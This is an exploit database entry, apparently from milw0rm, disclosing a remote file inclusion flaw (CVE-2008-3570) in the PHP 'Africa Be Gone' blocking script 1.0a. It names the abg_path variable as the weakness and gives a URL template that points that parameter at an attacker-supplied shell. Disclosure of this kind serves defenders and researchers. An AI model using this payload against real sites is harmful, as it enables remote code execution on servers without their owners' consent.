ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion

Author: Lo$er
type: webapps
platform: php
port: 
date_added: 2008-07-31  
date_updated: 2016-12-15  
verified: 1  
codes: OSVDB-47381;CVE-2008-3570  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6183.txt  

=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]